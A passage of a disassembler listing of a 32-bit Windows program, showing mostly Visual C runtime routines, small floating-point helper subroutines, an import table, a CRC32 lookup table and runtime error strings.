; [00000058 BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [000001B4 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [00000132 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_428628
jmp short loc_417D60
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_2: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000153 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [000001AD BYTES: COLLAPSED FUNCTION __write. PRESS KEYPAD "+" TO EXPAND]
; [00000044 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000026 BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
; [000000A5 BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION _wctomb. PRESS KEYPAD "+" TO EXPAND]
; [000000C8 BYTES: COLLAPSED FUNCTION _mbtowc. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION _isspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __allshl. PRESS KEYPAD "+" TO EXPAND]
; [0000006E BYTES: COLLAPSED FUNCTION _ungetc. PRESS KEYPAD "+" TO EXPAND]
; [00000149 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000095 BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000077 BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000003D BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION __commit. PRESS KEYPAD "+" TO EXPAND]
; [000002B9 BYTES: COLLAPSED FUNCTION __sopen. PRESS KEYPAD "+" TO EXPAND]
; [00000035 BYTES: COLLAPSED FUNCTION __control87. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION __controlfp. PRESS KEYPAD "+" TO EXPAND]
; [00000092 BYTES: COLLAPSED FUNCTION __abstract_cw. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION __hw_cw. PRESS KEYPAD "+" TO EXPAND]
; [00000049 BYTES: COLLAPSED FUNCTION __ZeroTail. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION __IncMan. PRESS KEYPAD "+" TO EXPAND]
; [0000008C BYTES: COLLAPSED FUNCTION __RoundMan. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __CopyMan. PRESS KEYPAD "+" TO EXPAND]
; [0000000C BYTES: COLLAPSED FUNCTION __FillZeroMan. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __IsZeroMan. PRESS KEYPAD "+" TO EXPAND]
; [0000008D BYTES: COLLAPSED FUNCTION __ShrMan. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION __ld12cvt. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4192B5 proc near ; CODE XREF: sub_4192E1+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_428950
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_4192B5 endp
; =============== S U B R O U T I N E =======================================
sub_4192CB proc near ; CODE XREF: sub_41930E+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_428968
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_4192CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192E1 proc near ; CODE XREF: __fassign+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_4192B5
add esp, 24h
leave
retn
sub_4192E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41930E proc near ; CODE XREF: __fassign+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_4192CB
add esp, 24h
leave
retn
sub_41930E endp
; [00000077 BYTES: COLLAPSED FUNCTION __fptostr. PRESS KEYPAD "+" TO EXPAND]
; [00000064 BYTES: COLLAPSED FUNCTION __fltout. PRESS KEYPAD "+" TO EXPAND]
; [000000B6 BYTES: COLLAPSED FUNCTION ___dtold. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 2
call __amsg_exit
pop ecx
retn
; [00000015 BYTES: COLLAPSED FUNCTION ___tzset. PRESS KEYPAD "+" TO EXPAND]
; [0000025E BYTES: COLLAPSED FUNCTION __tzset. PRESS KEYPAD "+" TO EXPAND]
; [000001AC BYTES: COLLAPSED FUNCTION __isindst. PRESS KEYPAD "+" TO EXPAND]
; [00000140 BYTES: COLLAPSED FUNCTION _cvtdate. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
; [0000007D BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
; [00000146 BYTES: COLLAPSED FUNCTION __chsize. PRESS KEYPAD "+" TO EXPAND]
; [00000021 BYTES: COLLAPSED FUNCTION ___addl. PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION ___add_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION ___shl_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION ___shr_12. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION ___mtold12. PRESS KEYPAD "+" TO EXPAND]
; [000004A1 BYTES: COLLAPSED FUNCTION ___strgtold12. PRESS KEYPAD "+" TO EXPAND]
off_41A35C dd offset loc_419F25 ; DATA XREF: ___strgtold12+63�r
dd offset loc_419F74 ; jump table for switch statement
dd offset loc_419FCB
dd offset loc_419FF5
dd offset loc_41A050
dd offset loc_41A0C7
dd offset loc_41A0FD
dd offset loc_41A147
dd offset loc_41A126
dd offset loc_41A1AB
dd offset loc_41A195
dd offset loc_41A161
; [00000293 BYTES: COLLAPSED FUNCTION _$I10_OUTPUT. PRESS KEYPAD "+" TO EXPAND]
; [0000007D BYTES: COLLAPSED FUNCTION _getenv. PRESS KEYPAD "+" TO EXPAND]
; [00000076 BYTES: COLLAPSED FUNCTION __setmode. PRESS KEYPAD "+" TO EXPAND]
; [00000220 BYTES: COLLAPSED FUNCTION ___ld12mul. PRESS KEYPAD "+" TO EXPAND]
; [0000007C BYTES: COLLAPSED FUNCTION ___multtenpow12. PRESS KEYPAD "+" TO EXPAND]
; [0000003F BYTES: COLLAPSED FUNCTION __mbsnbicoll. PRESS KEYPAD "+" TO EXPAND]
; [0000006E BYTES: COLLAPSED FUNCTION ___wtomb_environ. PRESS KEYPAD "+" TO EXPAND]
; [0000027D BYTES: COLLAPSED FUNCTION ___crtCompareStringA. PRESS KEYPAD "+" TO EXPAND]
; [00000187 BYTES: COLLAPSED FUNCTION ___crtsetenv. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _findenv. PRESS KEYPAD "+" TO EXPAND]
; [00000067 BYTES: COLLAPSED FUNCTION _copy_environ. PRESS KEYPAD "+" TO EXPAND]
; [00000073 BYTES: COLLAPSED FUNCTION __mbschr. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __strdup. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41AFC0 proc near ; CODE XREF: sub_404059+15D�p
jmp ds:dword_41B1D0
sub_41AFC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41AFC6 proc near ; CODE XREF: __global_unwind2+13�p
jmp ds:dword_41B024
sub_41AFC6 endp
_text ends
; Section 2. (virtual address 0001B000)
; Virtual size : 0000141C ( 5148.)
; Section size in file : 0000141C ( 5148.)
; Offset to raw data for section: 0001B000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 41B000h
dword_41B000 dd 77E70396h ; DATA XREF: sub_40724A+126�r
; WinMain(x,x,x,x)+1B5�r ...
dword_41B004 dd 77E6BD68h ; DATA XREF: ___crtsetenv+173�r
dword_41B008 dd 77E77F2Eh ; DATA XREF: ___crtCompareStringA+3E�r
; ___crtCompareStringA+261�r
dword_41B00C dd 77E762D0h ; DATA XREF: ___crtCompareStringA+5B�r
; ___crtCompareStringA+B9�r
dword_41B010 dd 77E70192h ; DATA XREF: __chsize+F9�r
dword_41B014 dd 77E73FF9h ; DATA XREF: __commit+2C�r
dword_41B018 dd 77E7FF2Eh ; DATA XREF: __set_osfhnd:loc_4189FB�r
; __free_osfhnd:loc_418A75�r
dword_41B01C dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+3F�r
; ___crtGetStringTypeA+12D�r
dword_41B020 dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+59�r
; ___crtGetStringTypeA+8D�r
dword_41B024 dd 77F6183Eh ; DATA XREF: sub_41AFC6�r
dword_41B028 dd 77E78406h ; DATA XREF: __ioinit+FF�r
; __ioinit+166�r ...
dword_41B02C dd 77E79C3Dh ; DATA XREF: __ioinit+158�r
; __NMSG_WRITE+143�r
dword_41B030 dd 77E7C931h ; DATA XREF: __ioinit+19D�r
dword_41B034 dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+9�r
dword_41B038 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_4179CF�r
; ___crtGetEnvironmentStringsA+E1�r
dword_41B03C dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+CE�r
dword_41B040 dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+11F�r
dword_41B044 dd 77E77CCEh ; DATA XREF: sub_401000+66�r
; sub_4010E3+65�r ...
dword_41B048 dd 77E61BE6h ; DATA XREF: sub_4010E3+A9�r
; sub_4013EE+2C2�r ...
dword_41B04C dd 77E78B82h ; DATA XREF: sub_4013EE+135�r
; sub_405680+80�r ...
dword_41B050 dd 77E77963h ; DATA XREF: sub_4013EE+120�r
; sub_4013EE+150�r ...
dword_41B054 dd 77E79D8Ch ; DATA XREF: sub_4013EE+103�r
; sub_403520+137�r ...
dword_41B058 dd 77E73EACh ; DATA XREF: sub_4013EE+E9�r
dword_41B05C dd 77E7A837h ; DATA XREF: sub_4013EE+68�r
; sub_403520+5D�r ...
dword_41B060 dd 77F5157Dh ; DATA XREF: sub_4022E3:loc_40241F�r
; sub_4022E3:loc_402543�r ...
dword_41B064 dd 77E7AC37h ; DATA XREF: sub_4022E3+10E�r
; sub_4022E3+22D�r ...
dword_41B068 dd 77E7A099h ; DATA XREF: sub_4022E3+58�r
; sub_4022E3+177�r ...
dword_41B06C dd 77E73C49h ; DATA XREF: sub_4027F8+20E�r
; sub_402A0C+23F�r ...
dword_41B070 dd 77F7E300h ; DATA XREF: sub_4027F8+13F�r
dword_41B074 dd 77F7E21Fh ; DATA XREF: sub_4027F8+D4�r
dword_41B078 dd 77E7751Ah ; DATA XREF: sub_4027F8+32�r
; sub_4030D9+27�r ...
dword_41B07C dd 77E7C706h ; DATA XREF: sub_402A0C+77�r
dword_41B080 dd 77F53275h ; DATA XREF: sub_402A0C+6B�r
; sub_402A0C+22F�r
dword_41B084 dd 77E70F89h ; DATA XREF: sub_402D63+D�r _time+D�r
dword_41B088 dd 77E802FCh ; DATA XREF: sub_40318B+18C�r
; sub_40318B+2D4�r ...
dword_41B08C dd 77E6D75Bh ; DATA XREF: sub_40318B+182�r
; sub_410A5A+FF�r
dword_41B090 dd 77E75CB5h ; DATA XREF: sub_403520+478�r
; sub_403DCB+DF�r ...
dword_41B094 dd 77E61BB8h ; DATA XREF: sub_403520+462�r
; sub_403DCB+A7�r ...
dword_41B098 dd 77E704FCh ; DATA XREF: sub_403DCB+74�r
; WinMain(x,x,x,x)+C7�r ...
dword_41B09C dd 77E64106h ; DATA XREF: sub_404BCC+9F�r
; sub_410E85+1B6�r
dword_41B0A0 dd 77E64006h ; DATA XREF: sub_404BCC+8B�r
; sub_410E85+19F�r
dword_41B0A4 dd 77E793EFh ; DATA XREF: sub_404D4E+1EE�r
; sub_405680+38�r
dword_41B0A8 dd 77E74CABh ; DATA XREF: sub_404D4E+110�r
; sub_40724A+10F�r ...
dword_41B0AC dd 77E78EAAh ; DATA XREF: sub_404FFE+5E8�r
dword_41B0B0 dd 77E79424h ; DATA XREF: sub_404FFE+27B�r
dword_41B0B4 dd 77E794BFh ; DATA XREF: sub_404FFE+26D�r
dword_41B0B8 dd 77E75E67h ; DATA XREF: sub_404FFE+20D�r
; sub_404FFE+5D7�r
dword_41B0BC dd 77E75D9Eh ; DATA XREF: sub_404FFE+1FC�r
dword_41B0C0 dd 77E78C81h ; DATA XREF: sub_405680+6C�r
; __lseek+4F�r
dword_41B0C4 dd 77E805D8h ; DATA XREF: sub_405EFF+13A�r
; sub_405EFF:loc_406395�r ...
dword_41B0C8 dd 77E7A5FDh ; DATA XREF: sub_405EFF+11�r
; __ms_p5_mp_test_fdiv+15�r ...
dword_41B0CC dd 77E79F93h ; DATA XREF: sub_405EFF+2�r
; sub_40724A+FB�r ...
dword_41B0D0 dd 77E76A60h ; DATA XREF: sub_40703D+2D�r
dword_41B0D4 dd 77E71B14h ; DATA XREF: sub_4070C7+26�r
dword_41B0D8 dd 77E7166Fh ; DATA XREF: sub_4070C7+1D�r
dword_41B0DC dd 77E75090h ; DATA XREF: sub_407102+69�r
dword_41B0E0 dd 77E74D76h ; DATA XREF: sub_407102+36�r
dword_41B0E4 dd 77E77797h ; DATA XREF: sub_407102+25�r
dword_41B0E8 dd 77E7011Ah ; DATA XREF: sub_407184+96�r
dword_41B0EC dd 77E73CE2h ; DATA XREF: sub_407184+60�r
dword_41B0F0 dd 77E668D9h ; DATA XREF: sub_40724A+15D�r
dword_41B0F4 dd 77E6AD34h ; DATA XREF: sub_40724A+35�r
; sub_409557+35E2�r
dword_41B0F8 dd 77E79924h ; DATA XREF: ___crtLCMapStringA+20D�r
; ___crtGetEnvironmentStringsA+7E�r ...
dword_41B0FC dd 77E65F4Ch ; DATA XREF: sub_40822D+34�r
; .text:0040F7A1�r
dword_41B100 dd 77E79C90h ; DATA XREF: sub_408849+C�r
; sub_40F002+79�r ...
dword_41B104 dd 77E616B4h ; DATA XREF: sub_4088B4+113�r
; sub_4088B4+21B�r ...
dword_41B108 dd 77E76A2Eh ; DATA XREF: sub_4088B4+DE�r
dword_41B10C dd 77E706B7h ; DATA XREF: sub_4088B4+B9�r
; sub_408BC1+10�r ...
dword_41B110 dd 77E73628h ; DATA XREF: WinMain(x,x,x,x)+33B�r
; sub_409557+3E6C�r ...
dword_41B114 dd 77E80656h ; DATA XREF: WinMain(x,x,x,x)+267�r
dword_41B118 dd 77E6BD13h ; DATA XREF: WinMain(x,x,x,x):loc_408DD3�r
dword_41B11C dd 77E79D5Bh ; DATA XREF: WinMain(x,x,x,x)+6B�r
; WinMain(x,x,x,x)+311�r
dword_41B120 dd 77E7C2C4h ; DATA XREF: WinMain(x,x,x,x)+64�r
dword_41B124 dd 77E75CEBh ; DATA XREF: sub_409557+40C0�r
; sub_40FC5F+9F�r ...
dword_41B128 dd 77E71AFEh ; DATA XREF: sub_409557+34AC�r
dword_41B12C dd 77E7FF65h ; DATA XREF: sub_40EEAD+5A�r
dword_41B130 dd 77EB7624h ; DATA XREF: sub_40EEAD+3D�r
dword_41B134 dd 77E79CE3h ; DATA XREF: sub_40F002+91�r
; sub_40FEA9+77�r
dword_41B138 dd 77E7727Ah ; DATA XREF: sub_40F002+3B�r
; sub_40FDB0+23�r
dword_41B13C dd 77E76968h ; DATA XREF: sub_40F445+5F�r
dword_41B140 dd 77E7513Ch ; DATA XREF: .text:0040F838�r
dword_41B144 dd 77E7C657h ; DATA XREF: .text:0040F8AC�r
; sub_410E85+24�r
dword_41B148 dd 77E74C59h ; DATA XREF: sub_40FC5F+C7�r
dword_41B14C dd 77EC7C51h ; DATA XREF: sub_410034+5E�r
dword_41B150 dd 77E76C1Ah ; DATA XREF: sub_410E85+1CF�r
dword_41B154 dd 77F516F8h ; DATA XREF: __heap_alloc+2E�r
; _realloc+AF�r ...
dword_41B158 dd 77F51597h ; DATA XREF: _free+27�r
; ___sbh_free_block+2C4�r ...
dword_41B15C dd 77F5722Fh ; DATA XREF: _realloc+F0�r
; ___sbh_alloc_new_region+28�r
dword_41B160 dd 77E76E3Dh ; DATA XREF: _time+6C�r __tzset+38�r
dword_41B164 dd 77E61608h ; DATA XREF: _time+17�r
dword_41B168 dd 77E6177Ah ; DATA XREF: start+9F�r __ioinit+59�r
dword_41B16C dd 77E7C938h ; DATA XREF: start+74�r
dword_41B170 dd 77E7C486h ; DATA XREF: start+26�r
dword_41B174 dd 77E76E0Bh ; DATA XREF: __heap_init+2F�r
dword_41B178 dd 77E7C726h ; DATA XREF: __heap_init+11�r
dword_41B17C dd 77E79E34h ; DATA XREF: ___sbh_free_block+23F�r
dword_41B180 dd 77E7980Ah ; DATA XREF: ___sbh_alloc_new_region+76�r
; ___sbh_alloc_new_group+51�r
dword_41B184 dd 77E77405h ; DATA XREF: ___crtLCMapStringA+5E�r
; ___crtLCMapStringA+A7�r
dword_41B188 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+42�r
; ___crtLCMapStringA+14D�r ...
dword_41B18C dd 77E7849Fh ; DATA XREF: __setmbcp+48�r
; _setSBUpLow+14�r ...
dword_41B190 dd 77E7A13Fh ; DATA XREF: _getSystemCP+2F�r
dword_41B194 dd 77E6C703h ; DATA XREF: _getSystemCP+1A�r
dword_41B198 dd 77EB9A84h ; DATA XREF: __XcptFilter+138�r
align 10h
dword_41B1A0 dd 71AB12F8h ; DATA XREF: sub_40465A+35�r
dword_41B1A4 dd 71AB3E5Dh ; DATA XREF: sub_40465A+57�r
dword_41B1A8 dd 71AB1836h ; DATA XREF: sub_40465A+6E�r
; sub_4046D7+8E�r
dword_41B1AC dd 71AB41DAh ; DATA XREF: sub_404059+47�r
; sub_40465A+15�r
dword_41B1B0 dd 71AB3C22h ; DATA XREF: sub_404059+78�r
; sub_40465A+21�r
dword_41B1B4 dd 71AB3F8Dh ; DATA XREF: sub_404059+91�r
dword_41B1B8 dd 71AB155Ah ; DATA XREF: sub_404059+A1�r
dword_41B1BC dd 71AB1746h ; DATA XREF: sub_404059+B7�r
; sub_40465A+41�r
dword_41B1C0 dd 71AB3ECEh ; DATA XREF: sub_404059+C8�r
dword_41B1C4 dd 71AB5DE2h ; DATA XREF: sub_404059+DC�r
dword_41B1C8 dd 71AB1AF4h ; DATA XREF: sub_404059+E8�r
; sub_4046D7+66�r
dword_41B1CC dd 71AB1890h ; DATA XREF: sub_404059+119�r
dword_41B1D0 dd 71AB1B7Bh ; DATA XREF: sub_41AFC0�r
dword_41B1D4 dd 71AB868Dh ; DATA XREF: sub_404059+184�r
dword_41B1D8 dd 71AB5690h ; DATA XREF: sub_404059+1F4�r
dword_41B1DC dd 71AB1A6Dh ; DATA XREF: sub_404059+245�r
; sub_40465A+68�r ...
dd 2 dup(0)
dword_41B1E8 dd 0 ; DATA XREF: sub_40302C+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h
byte_41B5DC db 0A1h ; DATA XREF: __output+4A�r
db 8Eh, 0Ch, 0C3h
dd 5A05DF1Bh, 2D02EF8Dh
dbl_41B5E8 dq 9.765625e-4 ; DATA XREF: sub_403520+2BD�r
; sub_403520+2D8�r ...
dword_41B5F0 dd 0FFFFFFFFh, 413DBBh, 413DCFh ; DATA XREF: start+5�o
byte_41B5FC db 6 ; DATA XREF: __output:loc_414B25�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_4280F4�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_4280F0�o
align 10h
dbl_41B670 dq 1.0 ; DATA XREF: __ms_p5_test_fdiv+2A�r
dbl_41B678 dq 4.195835e6 ; DATA XREF: __ms_p5_test_fdiv+F�r
dbl_41B680 dq 3.145727e6 ; DATA XREF: __ms_p5_test_fdiv+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: __ms_p5_mp_test_fdiv+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: __ms_p5_mp_test_fdiv�o
align 10h
dbl_41B6B0 dq 0.0 ; DATA XREF: __positive+6�r
; char aE000[]
aE000 db 'e+000',0 ; DATA XREF: __cftoe+93�o
align 10h
dword_41B6C0 dd 2 dup(0) ; DATA XREF: ___crtLCMapStringA+36�o
; ___crtGetStringTypeA+39�o ...
dword_41B6C8 dd 0FFFFFFFFh, 416C59h, 416C5Dh, 0FFFFFFFFh, 416D0Dh, 416D11h
; DATA XREF: ___crtLCMapStringA+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
